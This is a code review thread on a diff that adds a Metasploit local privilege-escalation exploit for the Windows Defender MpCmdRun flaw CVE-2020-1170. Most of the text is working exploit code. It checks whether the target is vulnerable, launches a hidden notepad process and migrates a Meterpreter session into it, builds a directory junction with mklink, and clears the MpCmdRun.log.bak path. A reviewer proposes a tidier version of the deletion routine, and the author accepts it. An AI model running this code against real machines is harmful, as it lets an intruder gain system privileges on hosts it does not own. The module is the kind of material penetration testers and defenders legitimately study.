modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,219 @@
+      # to https://answers.microsoft.com/en-us/windows/forum/windows_vista-security/windows-defender-error-0x800106ba/0e2f4e98-4e5f-4991-8994-0f8c80784547
+      print_error('The target has an outdated version of MpCmdRun.exe installed but they have another AV installed.')
+      return CheckCode::Safe
+    else
+      print_good('Target appears to have an outdated version of MpCmdRun.exe that is being actively used.')
+      return CheckCode::Appears
+    end
+  end
+
+  def launch_background_injectable_notepad_and_migrate
+    print_status('Launching notepad to continue executing PowerShell commands to write to the file without things failing...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+    process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{process.pid} launched.")
+    session.migrate(process.pid)
+    process.pid
+  rescue Rex::Post::Meterpreter::RequestError
+    # Sandboxes could not allow to create a new process
+    # stdapi_sys_process_execute: Operation failed: Access is denied.
+    print_error('Operation failed. Trying to elevate the current process...')
+    process = client.sys.process.open
+    session.migrate(process.pid)
+    process.pid
+  end
+
+  def make_directory_junction(original_directory, target_directory)
+    print_status('Creating the directory junction...')
+    junction_creation_result = cmd_exec("cmd.exe /C \"mklink /J #{original_directory} #{target_directory}\"")
+    if junction_creation_result =~ /Junction created/
+      print_good('Junction was successfully created!')
+      return 1
+    elsif junction_creation_result =~ /file already exists/ # If the file already exists on the target...
+      return 2
+    else
+      print_error("Directory junction failed. Error code was (#{junction_creation_result['GetLastError']}): #{junction_creation_result['ErrorMessage']}")
+      return -1
+    end
+  end
+
+  def delete_existing_mpcmdrun_file_or_folder
+    mpcmdrun_path = 'C:\\Windows\\Temp\\MpCmdRun.log.bak'
+    result_file_deletion = rm_f(mpcmdrun_path) # Then we try to delete it as a file....
+    if result_file_deletion['GetLastError'] != 0 # Aka we failed
+      result_junction_deletion = rm_rf(mpcmdrun_path) # And as a directory junction or folder...
+      if result_junction_deletion['GetLastError'] != 0 # Aka we failed...
+        print_error("Looks like the #{mpcmdrun_path} file/folder already exists on this target, and we can't delete it.")
+        print_error("Error code (#{result_junction_deletion['GetLastError']}): #{result_junction_deletion['ErrorMessage']}")
+        return false
+      else
+        print_good("Deleted the already existing #{mpcmdrun_path} folder on the target successfully!")
+        return true
+      end
+    else
+      print_good("Deleted the already existing #{mpcmdrun_path} file on the target successfully!")
+      return true
+    end
+  end
```

Comment:
```suggestion
  def delete_existing_mpcmdrun_file_or_folder
    mpcmdrun_path = 'C:\\Windows\\Temp\\MpCmdRun.log.bak'
    result_file_deletion = rm_f(mpcmdrun_path) # Then we try to delete it as a file....

    if result_file_deletion['GetLastError'] == 0
      print_good("Deleted the already existing #{mpcmdrun_path} file on the target successfully!")
      return true
    end

    result_junction_deletion = rm_rf(mpcmdrun_path) # And as a directory junction or folder...
    
    if result_junction_deletion['GetLastError'] == 0
      print_good("Deleted the already existing #{mpcmdrun_path} folder on the target successfully!")
      return true
    end

    print_error("Looks like the #{mpcmdrun_path} file/folder already exists on this target, and we can't delete it.")
    print_error("Error code (#{result_junction_deletion['GetLastError']}): #{result_junction_deletion['ErrorMessage']}")
    return false
  end
```

Reply:
Thanks for refactoring this; looks a lot neater now and seems to highlight that I don't really do a good job at breaking down logic into isolated `if` statements, which often times is a lot neater and more logical. Applying your fixes with this next commit, much appreciated!